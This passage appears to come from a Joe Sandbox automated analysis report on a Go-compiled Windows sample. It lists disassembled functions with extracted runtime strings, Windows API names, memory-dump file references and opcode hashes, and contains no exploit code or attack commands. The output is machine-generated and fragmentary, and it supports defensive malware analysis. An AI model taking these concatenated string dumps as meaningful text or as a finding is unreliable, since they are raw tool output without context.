                                                                                                                            • ] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabkindpipeprofrootsbrksse3tcp4trueudp4uint ... MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDogr, xrefs: 01325714
                                                                                                                            • runtime: levelShift[level] = runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longtimeBegin/EndPeriod not foun, xrefs: 01325885
                                                                                                                            • , ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJST, xrefs: 013252EF, 0132530F, 0132572F, 0132574F
                                                                                                                            • ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinfmagc g, xrefs: 013252B6, 013256F9
                                                                                                                            • runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size bec, xrefs: 0132577E
                                                                                                                            • , levelBits[level] = AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Standard TimeEastern Standard TimeGetProfilesDirectoryWInscriptional_PahlaviLookupPrivilegeValueWMagadan Standard TimeMorocco , xrefs: 013258A5
                                                                                                                            • , npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai_LueOld_PersianOld_SogdianOpenProcessPau_Cin_HauRegClos, xrefs: 0132579C
                                                                                                                            • bad summary databad symbol tablecastogscanstatusgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapnewmHandoff.lockno route to hostnon-Go functionobje, xrefs: 0132537C, 01325ACC
                                                                                                                            • , j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaUNKNOWNWKOWAODWSARecvWSASendtypes value=c, xrefs: 013257BA
                                                                                                                            • ] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=%, xrefs: 013252D4
                                                                                                                            • runtime: npages = runtime: range = {runtime: textAddr streams pipe errorsystem page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=Altai Standard TimeBahia Standard TimeCa, xrefs: 0132534F
                                                                                                                            • ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ, xrefs: 0132532F
                                                                                                                            • , i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11WanchoYezidichan<-efencelistenobjectpopcntrdtscpselectso, xrefs: 01325825
                                                                                                                            • runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory ,, xrefs: 0132529B, 013256D2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ$, ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJST$, i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11WanchoYezidichan<-efencelistenobjectpopcntrdtscpselectso$, j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaUNKNOWNWKOWAODWSARecvWSASendtypes value=c$, levelBits[level] = AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Standard TimeEastern Standard TimeGetProfilesDirectoryWInscriptional_PahlaviLookupPrivilegeValueWMagadan Standard TimeMorocco $, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai_LueOld_PersianOld_SogdianOpenProcessPau_Cin_HauRegClos$] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=%$] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabkindpipeprofrootsbrksse3tcp4trueudp4uint ... MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDogr$][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinfmagc g$bad summary databad symbol tablecastogscanstatusgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapnewmHandoff.lockno route to hostnon-Go functionobje$runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size bec$runtime: levelShift[level] = runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longtimeBegin/EndPeriod not foun$runtime: npages = runtime: range = {runtime: textAddr streams pipe errorsystem page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=Altai Standard TimeBahia Standard TimeCa$runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaning bytes failed with errno= to unused region of spanAUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironmentStringsWGODEBUG: can n$runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory ,
                                                                                                                            • API String ID: 0-2227700264
                                                                                                                            • Opcode ID: 14e40b0fa269391e9d220e59527eef905deeec2b1502a8525b7866a8c2197ac9
                                                                                                                            • Instruction ID: ca88d0d332ac100233b01df9445f5af6ded81a1ea5867ceb65cc15fe69777604
                                                                                                                            • Opcode Fuzzy Hash: 14e40b0fa269391e9d220e59527eef905deeec2b1502a8525b7866a8c2197ac9
                                                                                                                            • Instruction Fuzzy Hash: 2D32DC72314BD581EB24EB19E8403DBA325F799BD8F444122CE9E17B68DF38C689CB44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01315BE0 Relevance: 16.9, Strings: 13, Instructions: 620COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_DigitInheritedKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanPGDGBKWR, xrefs: 013166B2
                                                                                                                            • +,-./0:<=?CLMPSZ[\, xrefs: 013164B6, 01316625
                                                                                                                            • (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriti, xrefs: 013167BC
                                                                                                                            • MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException , xrefs: 0131673C
                                                                                                                            • ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandina, xrefs: 013164E5
                                                                                                                            • @ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHST, xrefs: 01316365
                                                                                                                            • gc done but gcphase != _GCoffgfput: bad status (not Gdead)invalid function symbol tableinvalid length of trace eventio: read/write on closed pipemachine is not on the networkno XENIX semaphores availablenotesleep - waitm out of syncnumerical result out of rang, xrefs: 0131684F
                                                                                                                            • MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_ControlGetAddrI, xrefs: 0131675B
                                                                                                                            • gcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabic, xrefs: 01315CC9, 01315CD9
                                                                                                                            • MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohs, xrefs: 0131671A
                                                                                                                            • failed to set sweep barriergcstopm: not waiting for gcgrowslice: cap out of rangeinternal lockOSThread errorinvalid profile bucket typekey was rejected by servicemakechan: size out of rangemakeslice: cap out of rangemakeslice: len out of rangemspan.sweep: bad , xrefs: 01316833
                                                                                                                            • ., xrefs: 013162CD
                                                                                                                            • MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep wait, xrefs: 0131677A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriti$ @ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHST$ MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep wait$ MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException $ MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_ControlGetAddrI$ MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohs$ ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandina$ ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_DigitInheritedKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanPGDGBKWR$+,-./0:<=?CLMPSZ[\$.$failed to set sweep barriergcstopm: not waiting for gcgrowslice: cap out of rangeinternal lockOSThread errorinvalid profile bucket typekey was rejected by servicemakechan: size out of rangemakeslice: cap out of rangemakeslice: len out of rangemspan.sweep: bad $gc done but gcphase != _GCoffgfput: bad status (not Gdead)invalid function symbol tableinvalid length of trace eventio: read/write on closed pipemachine is not on the networkno XENIX semaphores availablenotesleep - waitm out of syncnumerical result out of rang$gcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabic
                                                                                                                            • API String ID: 0-1706010489
                                                                                                                            • Opcode ID: 78a17fd5057414e0ea5205b764af314908f956125eed84916aaf99f513a8482d
                                                                                                                            • Instruction ID: 1e9d1f1be274db88757c5fe11135c7f71d799c4c97b52ffa28f6ffc0d5d02815
                                                                                                                            • Opcode Fuzzy Hash: 78a17fd5057414e0ea5205b764af314908f956125eed84916aaf99f513a8482d
                                                                                                                            • Instruction Fuzzy Hash: 2752AF72309B8585EB54EB69E8803DAB765F799B98F449122CE8D17B79CF3CC085C740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0130A2C0 Relevance: 15.3, Strings: 12, Instructions: 340COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • out of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is alre, xrefs: 0130A5C9
                                                                                                                            • runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangeslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-nega, xrefs: 0130A8B7
                                                                                                                            • region exceeds uintptr rangeruntime.semasleep unexpectedruntime: bad lfnode address runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunreserving unaligned regionCentral America Standard TimeCentral Pacific Standard TimeChatha, xrefs: 0130A7F9
                                                                                                                            • , ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJST, xrefs: 0130A8D2
                                                                                                                            • !, xrefs: 0130A81D
                                                                                                                            • out of memory allocating allArenasruntime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: c, xrefs: 0130A596
                                                                                                                            • memory reservation exceeds address space limitpanicwrap: unexpected string after type name: released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc h, xrefs: 0130A91E
                                                                                                                            • base outside usable address spaceconcurrent map read and map writecrypto/aes: output not full blockfindrunnable: negative nmspinningfreeing stack not in a stack spanheapBitsSetType: unexpected shiftmin must be a non-zero power of 2misrounded allocation in sysA, xrefs: 0130A823
                                                                                                                            • arena already initializedbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer space availableno such de, xrefs: 0130A5B8
                                                                                                                            • ) not in usable address space: ...additional frames elided....lib section in a.out corruptedCentral Brazilian Standard TimeMountain Standard Time (Mexico)W. Central Africa Standard Timebad write barrier buffer boundscall from within the Go runtimecannot assig, xrefs: 0130A8EF
                                                                                                                            • out of memory allocating heap arena metadataruntime: lfstack.push invalid packing: node=cannot send after transport endpoint shutdownexitsyscall: syscall frame is no longer validheapBitsSetType: called with non-pointer typereflect: internal error: invalid meth, xrefs: 0130A5A7
                                                                                                                            • end outside usable address spacenumerical argument out of domainpanic while printing panic valueremovespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedruntime: failed to release pagesruntime: fixalloc size too largerunt, xrefs: 0130A851
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: !$) not in usable address space: ...additional frames elided....lib section in a.out corruptedCentral Brazilian Standard TimeMountain Standard Time (Mexico)W. Central Africa Standard Timebad write barrier buffer boundscall from within the Go runtimecannot assig$, ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJST$arena already initializedbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer space availableno such de$base outside usable address spaceconcurrent map read and map writecrypto/aes: output not full blockfindrunnable: negative nmspinningfreeing stack not in a stack spanheapBitsSetType: unexpected shiftmin must be a non-zero power of 2misrounded allocation in sysA$end outside usable address spacenumerical argument out of domainpanic while printing panic valueremovespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedruntime: failed to release pagesruntime: fixalloc size too largerunt$memory reservation exceeds address space limitpanicwrap: unexpected string after type name: released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc h$out of memory allocating allArenasruntime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: c$out of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is alre$out of memory allocating heap arena metadataruntime: lfstack.push invalid packing: node=cannot send after transport endpoint shutdownexitsyscall: syscall frame is no longer validheapBitsSetType: called with non-pointer typereflect: internal error: invalid meth$region exceeds uintptr rangeruntime.semasleep unexpectedruntime: bad lfnode address runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunreserving unaligned regionCentral America Standard TimeCentral Pacific Standard TimeChatha$runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangeslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-nega
                                                                                                                            • API String ID: 0-4281024703
                                                                                                                            • Opcode ID: 801b16fa52d17eec68a0687cd73a9322ebe1bc4493f64cd69913fc1b349e4682
                                                                                                                            • Instruction ID: bfe4f0a7ffe697cd7c83169bc7b40ae327ec3f158b9f4b1f808b0cdb35bc62d8
                                                                                                                            • Opcode Fuzzy Hash: 801b16fa52d17eec68a0687cd73a9322ebe1bc4493f64cd69913fc1b349e4682
                                                                                                                            • Instruction Fuzzy Hash: 6BE1AA72314B8482DB259B5AF4503DAB7A8F789B98F844226EFAD57B98DF3CC545C300
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AC53D0 Relevance: 13.3, APIs: 10, Instructions: 790COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                                                                            • String ID:
